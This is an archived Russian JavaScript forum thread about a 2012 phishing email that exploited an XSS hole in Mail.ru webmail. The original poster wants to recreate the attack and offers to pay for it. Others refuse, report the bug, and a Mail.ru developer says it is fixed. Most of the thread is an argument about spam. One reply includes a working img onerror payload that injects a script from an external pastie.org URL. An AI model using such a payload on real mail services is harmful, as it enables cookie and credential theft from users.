Javascript-форум (https://javascript.ru/forum/)
-   Оффтопик (https://javascript.ru/forum/offtopic/)
-   -   очень интересный фишинг (https://javascript.ru/forum/offtopic/28294-ochen-interesnyjj-fishing.html)

vagabunt 14.05.2012 10:23

очень интересный фишинг
 
Здравствуйте, уважаемые.

Дело тут такое. Пришло вчера мне на почту письмо, (mail.ru)



с темой документы срочно. Открываю меня сразу перекидывает в папку входящие





Но я думаю глюк какой то. Через 30 секунд всплывает аут форма.



Форма отправляет данные на парсер, который находится на холмах. (hut.ru)


Я попытался сделать такую фичу самостоятельно. Вытащил html из тела письма. Но чет не получается.

Кто бы мне мог помочь в этом деле? Товарищи знатоки.

Спасибо за внимание)

melky 14.05.2012 10:42

картинки бы посжимать, а то вёрстка поехала ... ну да ладно

меня бы как пользователя, насторожило бы это



красненькой стрелочкой помечено что-то неведомое (ломание вёрстки, xss?)

красненьким овальчиком - это похоже на ajax spinner с facebook, что оно тут делает?

PS наконец то попробовал gimp 2.8

vagabunt 14.05.2012 11:08

Где изображение там это.



Ведет на js файл с этим содержанием.

http://zalil.ru/33232691

PS. Сюда скопировать не мог, так как превышает 10000 символов

А где красненький кружечек, там ничего особенного когда mail не может загрузить картинку он выдает
такую вот штучку

vagabunt 14.05.2012 11:21

Мне собственно говоря, какой злоумышленники отправляют код)) Чтобы в страницу mail.ru впечатался так сказать свой java который через 30 секунд после открытия письма выдавал фишинговую форму прям на сайте)

B@rmaley.e><e 14.05.2012 11:28

Цитата:

Сообщение от vagabunt
Ведет на js файл с этим содержанием.

http://zalil.ru/33232691

А там, в свою очередь это: http://pastebin.com/YN5TriVm
Оно ещё и куки пытается стащить.

vagabunt, лучше сообщите об этом в техподдержку mail.ru
А ещё лучше — пользуйтесь GMail :-)

vagabunt 14.05.2012 11:36

Цитата:

Сообщение от B@rmaley.e><e (Сообщение 174382)
А там, в свою очередь это: http://pastebin.com/YN5TriVm
Оно ещё и куки пытается стащить.

vagabunt, лучше сообщите об этом в техподдержку mail.ru
А ещё лучше — пользуйтесь GMail :-)

Да я хочу сделать так же)) только вот не могу , не знаю что они шлют через свой сендер) какой скрипт)

Kolyaj 14.05.2012 14:12

vagabunt,
а исходник письма можете показать?

Илья Кантор 14.05.2012 14:31

Информация отправлена разработчикам Mail.ru
Надеюсь, топикстартер только за ;)

melky 14.05.2012 14:53

Цитата:

Сообщение от vagabunt (Сообщение 174388)
Да я хочу сделать так же)) только вот не могу , не знаю что они шлют через свой сендер) какой скрипт)

обычная xss ... вот пример покруче
<img src onerror=alert('XSS')>

вместо alert'а можно подставить, что хочешь.

и кстати, скрипт можно было вставить короче :
<img src onerror=(a=document).body.appendChild(a.createElement('scr'+'ipt')).src='http://pastie.org/pastes/3909315/text';a.b;>


только вот вопрос.. как оно на mail.ru прошло?

vagabunt 14.05.2012 15:31

Цитата:

Сообщение от Илья Кантор (Сообщение 174426)
Информация отправлена разработчикам Mail.ru
Надеюсь, топикстартер только за ;)

Вот топикстартер не фига не за:)

Топикустартеру интересно)) какой скрипт отсылают через сендер)

FINoM 14.05.2012 22:41

Цитата:

Сообщение от Илья Кантор
Информация отправлена разработчикам Mail.ru

Я понимаю, конечно, добрые дела и всё такое. Но зачем помогать зажравшемуся треш-холдингу с глючными сервисами, украшенному рекламой, как новогодняя ёлка гирляндами? У них даже элементарного уважения к пользователю нету. Возьмите хотя-бы банальную регистрацию мыла: зарегистрируйтесь, не выкладывайте нигде свой адрес, потом, через некоторое время оцените, сколько спама пришло.

AndrewSumin 14.05.2012 22:56

Дайте емайл, на который приходит спам сразу после регистрации.

FINoM 14.05.2012 22:58

Он не приходит сразу, он приходит постоянно. Емейл не дам, не помню. Давно это было и не только у меня.

AndrewSumin 14.05.2012 23:13

Значит смотрите, реклама, из последнего.

— После приобретения Одноклассников Mail.Ru отменена платная регистрация.
— На почте Убрали стартовую страницу с приличным числом баннеров.
— Убрали рекламу в ICQ, после прибретения.
— На главной странице после редизайна тоже убрали один баннер из трех.

Про спам. У нас очень хороший антиспам, я говорю сам как очень активный пользователь плюс мой емайл уж точно светится в интернете во многих местах.

У нас есть персональный антиспам, у нас у еиднственных есть сервис postmaster.mail.ru

И самое главное ошибки могут быть, но вариантов два: спам всетаки приходит и надо фиксить проблему, либо это ложь. Как вы понимаете в обоих случаях надо реагировать.

B@rmaley.e><e 14.05.2012 23:41

Цитата:

Сообщение от FINoM
Но зачем помогать зажравшемуся треш-холдингу

Затем, что страдают простые пользователи.

AndrewSumin 14.05.2012 23:43

Цитата:

Сообщение от B@rmaley.e><e (Сообщение 174521)
Затем, что страдают простые пользователи.

На тестовых серверах уже уязвимости нет, надеюсь завтра успеем починить всех.

vagabunt 14.05.2012 23:44

Ребятааа)))) давайте подумаем какой скрипт шлют взломщики чтобы он сработал в теле письма

AndrewSumin 14.05.2012 23:44

Цитата:

Сообщение от vagabunt (Сообщение 174523)
Ребятааа)))) давайте подумаем какой скрипт шлют взломщики чтобы он сработал в теле письма

Я не буду подсказывать.

FINoM 14.05.2012 23:45

Цитата:

Сообщение от B@rmaley.e><e
Затем, что страдают простые пользователи.

Аргумент. Но я бы, скорее, пропагандировал гмыло или яндекс, чем помогал развитию компании, вызывающей только негативные эмоции.

AndrewSumin 14.05.2012 23:46

Цитата:

Сообщение от FINoM (Сообщение 174525)
Аргумент. Но я бы, скорее, пропагандировал гмыло или яндекс, чем помогал развитию компании, вызывающей только негативные эмоции.

Эмоции это нормально, на то мы и люди и с этим не поспоришь.
Я против неподтвержденных фактов.

Kolyaj 14.05.2012 23:48

Цитата:

Сообщение от vagabunt
Ребятааа)))) давайте подумаем какой скрипт шлют взломщики чтобы он сработал в теле письма

А это не ответ?

Gvozd 14.05.2012 23:50

vagabunt,
Тебе надо - ты и думай.
Те кто считает это аморальным - не будут тебе помогать.
Те, у кого более лояльная мораль к данному действию - не будут помогать тебе бесплатно.
Ответ на твой вопрос(для актуальных уязвимостей) - стоит тысячи долларов на черном рынке, надо полагать.
Не думаю, что кто-то стал бы публиковать такие вещи на публичном форуме по просьбе первого встречного

vagabunt 14.05.2012 23:50

нет .. Это если даже просто в ХТМЛ сохранить и открыть ничего не происходит, а там когда письмо открываешь тебя редериктит обратно в папку входящие и через 30 сек всплывает форма фишинговая логина и пароля

vagabunt 14.05.2012 23:51

Цитата:

Сообщение от Gvozd (Сообщение 174529)
vagabunt,
Тебе надо - ты и думай.
Те кто считает это аморальным - не будут тебе помогать.
Те, у кого более лояльная мораль к данному действию - не будут помогать тебе бесплатно.
Ответ на твой вопрос(для актуальных уязвимостей) - стоит тысячи долларов на черном рынке, надо полагать.
Не думаю, что кто-то стал бы публиковать такие вещи на публичном форуме по просьбе первого встречного

Дык я готов заплатить)) не 1000 долларов)) стоят) а активка стоит 200 баксов.
Но дело в том что у меня есть пример на почте просто надо вытащить оттуда скрипт, у меня не получается

FINoM 15.05.2012 01:10

Цитата:

Сообщение от AndrewSumin
Я против неподтвержденных фактов.

Каких фактов? Тех, что мейл ру был год назад самым трешовым сервисом из тех, что можно себе вообразить? Сейчас, если они и исправляются, мне даже заходить туда тошно.

Да что там исправляются? Не отрезать лишние атрибуты у тега img — ну это верх несостоятельности разработчиков и тимлидеров, которые обязаны следить за такими вещами. И это в 2012 году, когда целые поколения выросли, имея доступ к интернету, и это когда майл.ру существует уже много лет. Это вам не тестовая версия нового веб сервиса, это сервис, которым уже пользуется много человек, много лет.

devote 15.05.2012 04:38

Цитата:

Сообщение от FINoM
Да что там исправляются? Не отрезать лишние атрибуты у тега img — ну это верх несостоятельности разработчиков и тимлидеров, которые обязаны следить за такими вещами. И это в 2012 году, когда целые поколения выросли, имея доступ к интернету, и это когда майл.ру существует уже много лет. Это вам не тестовая версия нового веб сервиса, это сервис, которым уже пользуется много человек, много лет.

Согласен, mail.ru это разводчик спама.. Я им одно время попользовался, и был сильно разочарован тем что из 100 писем 2 актуальных, остальное спам... Знаете но с таким почтавиком далеко не уедешь.

Да и по сей день спама там валом, у меня есть почта на нем и сейчас, но я ее обычно использую для регистрации на разных сервисах/форумах.. А когда захожу подтвердить очередную регистрацию, вижу сотню писем в папке входящие которые ну никак не имеют ко мне никакого отношения.

AndrewSumin 15.05.2012 08:48

Цитата:

Сообщение от FINoM (Сообщение 174534)
Каких фактов? Не отрезать лишние атрибуты у тега img — ну это верх несостоятельности разработчиков и тимлидеров

Если все так просто, то пришлите мне письмо, в котором есть такой аттрибут.

И не надо думать что все кроме Mail.Ru боги

https://www.google.ru/#hl=en&gs_nf=1...w=1440&bih=779

Цитата:

Сообщение от devote (Сообщение 174546)
Да и по сей день спама там валом, у меня есть почта на нем и сейчас, но я ее обычно использую для регистрации на разных сервисах/форумах..

Именно это и может повлечь за собой поток нежелательных писем. Если есть жалобы на спам, приведите факты. Если это действительно спам то мы улучшим антиспам фильтры если нет, то какова цель таких утверждений?

Еще раз повторю, мой емайл легко находится поисковимком, котрый, я уверен очень популярен на этом форуме, да и не только на этом.

https://www.google.ru/#hl=en&safe=of...w=1440&bih=779

В моем ящике спамфильтр работает отлично.

devote 15.05.2012 18:41

Цитата:

Сообщение от AndrewSumin
Именно это и может повлечь за собой поток нежелательных писем.

то-есть вы мне прикажите нигде не регистрироваться? Уж поверьте мою почту на гугле знают многие и она по крайней мере в отличии от майловской почты публична, я разработчик и моя почта гуляет по инету, но спама что-то я не вижу у гугла, он есть конечно-же но там где ей положено быть, в папке спама.
Цитата:

Сообщение от AndrewSumin
Если есть жалобы на спам, приведите факты. Если это действительно спам то мы улучшим антиспам фильтры если нет, то какова цель таких утверждений?

А зачем? ради кого или чего? Я пользуюсь тем что мне по душе, зачем мне еще тратить время на то что бы отправлять вам жалобы письма со спамом и т.д. Это ваша работа вы и мучайтесь с ней, не помню что бы гугл просил заниматься тем что вы просите. И цели тут нет, это всего лишь опыт использования вашего сервиса, причем негативный опыт.
Цитата:

Сообщение от AndrewSumin
Еще раз повторю, мой емайл легко находится поисковимком, котрый, я уверен очень популярен на этом форуме, да и не только на этом.

И что? Мой емайл тоже легко находится, тока к чему это? мол типо о вашей почте все знают и не спамят? Я рад за вас, но я не планирую использовать mail.ru для работы какой бы вы там антиспам не воткнули.

AndrewSumin 15.05.2012 18:45

Еще раз. Вы утверждате Mail.Ru не фильтрует спам. Это утверждение, его надо либо подтвердить фактами либо не делать утверждений которые не можете подтвердить.

FINoM 15.05.2012 19:16

Решил чисто из интереса проверить свой ящик. Пароль был успешно забыт, пришлось пройти восстановление. Не буду обращать внимания на то, что после первой попытки ввода пароля появилась капча (нормальные сервисы её показывают со второго или третьего раза), но понравилось следующее.

Ввел я новый пароль, выскочил алерт (не модальное окно с дизайном, а обычный алерт, который используют для тестирования, исключая бюджетные проекты, у владельцев которых просто нет денег на модальные окошки), сообщающий о том, что пароль не может состоять только из цифр. Где надпись, предупреждающая об этом? Может быть я сидел, придумывал сложный пароль, а тут на тебе. Затем, я ввел цифробуквенный пароль. К моему удивлению, выскачил еще один алерт, сообщающий (вы не поверите) «некорректный пароль». Очень исчерпывающе, спасибо.

Только подумав секунд десять, я понял, что парсер не хочет принимать кирилицу. Что за бред? Вы можете сказать, что это мелочи, но на мелочах и держится любой, уважающий себя сервис. (Если в кафе мне вовремя не меняют пепельницу, я туда больше не приду. А зачем, если официантам наплевать на свои обязанности и если по близости есть другое кафе?)

И это всего несколько минут, которые я уделил мейл.ру. Уверен, что посидев немного дольше, я бы нашел еще более глупые недоработки.

А спама во входящих действительно не было (точнее, папка с входящими была пуста), я даже на какой-то момент удивился, сдержав фразу «пацаны — ваще ребята». Но затем я вспомнил, что все письма, которые идут на мой ящик, перенаправляются на гмыло. Открыв папку со спамом, я убедился, что преждевременное удивление было напрасным.


(см. письма с желтой меткой)
Да, вполне возможно, что некоторые письма пришли из-за того, что я на них подписался. Но часть, безусловно, — обычный спам, который с легкостью прошел мейлрушечный фильтр, но не справился с фильтром гмыла.

AndrewSumin 15.05.2012 19:32

Про окна спорить не буду. Это вроде редких мест, куда мы не упели добраться, но факт на восстановлении пароля они такие.

Про спам спасибо, поанализируем. Я так понимаю сейчас в среднем одно письмо в день получается?

FINoM 15.05.2012 19:40

Не знаю, уже удалил всё.
Цитата:

Сообщение от AndrewSumin
Это вроде редких мест, куда мы не упели добраться

Да, отмазка хороша.

AndrewSumin 15.05.2012 19:44

Вопрос, перенаправление настроено через фильтры или именно как перенаправление?

AndrewSumin 15.05.2012 19:45

Цитата:

Сообщение от FINoM (Сообщение 174638)
Да, отмазка хороша.

Я это не отмазка, я же признал что плохо.

vagabunt 15.05.2012 20:36

Не хрена се вы тут палемику развели)))))

AndrewSumin 15.05.2012 20:37

Зато с пользой, один баг уже выявили, может сейчас еще выцепим. Очень полезно. Самый лучший фидбек именно от технарей.

FINoM 17.05.2012 05:32

Цитата:

Сообщение от AndrewSumin
Вопрос, перенаправление настроено через фильтры или именно как перенаправление?

Обычное перенаправление.

AndrewSumin 17.05.2012 09:14

В случае перенаправления мы работаем как прокси. Я понимаю что попросить попользоваться ящиком шансов нет, но всеравно спасибо.

Кстати, XSS должен пропасть, забыл написать.

beard 18.05.2012 00:07

AndrewSumin, а у вас новости те что на главной там табы и по штук 8 в каждом, спорт, политика и тд. Они вообще модерируються?

Иногда такая туфта, как такое проходит на главную? Туфта в смысле заголовок мало соответствует содержимому, т.е. по сути это не статья вообще. Неужели такая большая компания не может перечитать в день все новости на главной. Там всего то 56 в день 1 человеку на 3 часа работы + кофе попить.

AndrewSumin 18.05.2012 08:47

Туфта прямо сейчас?

Мы 2 месяца назад ужесточили условия можерации.


Часовой пояс GMT +3, время: 13:31.